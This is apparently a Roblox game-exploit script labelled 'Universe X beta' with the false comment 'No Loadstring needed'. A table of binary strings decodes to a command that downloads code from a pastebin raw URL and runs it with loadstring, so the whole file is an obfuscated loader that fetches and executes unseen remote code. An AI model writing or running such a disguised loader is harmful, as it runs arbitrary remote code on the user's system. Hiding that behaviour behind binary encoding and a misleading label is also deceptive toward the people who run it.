--[[ No Loadstring needed Universe X beta ]]-- local BinaryEncrypted = table.concat({'01101100','01101111','01100001','01100100','01110011','01110100','01110010','01101001','01101110','01100111','00101000','01100111','01100001','01101101','01100101','00111010','01001000','01110100','01110100','01110000','01000111','01100101','01110100','00101000','00100010','01101000','01110100','01110100','01110000','01110011','00111010','00101111','00101111','01110000','01100001','01110011','01110100','01100101','01100010','01101001','01101110','00101110','01100011','01101111','01101101','00101111','01110010','01100001','01110111','00101111','00110000','01001110','00110001','01111001','00110111','01010010','01111001','01001101','00100010','00101001','00101001','00101000','00101001',}) function decode(str) local function binary_to_string(bin) return string.char(tonumber(bin, 2));end;return (str:gsub("(".. ("[01]"):rep(8) .. ")", binary_to_string));end;local Binary = BinaryEncrypted _G.EncodedBinary = decode(Binary);loadstring(_G.EncodedBinary)()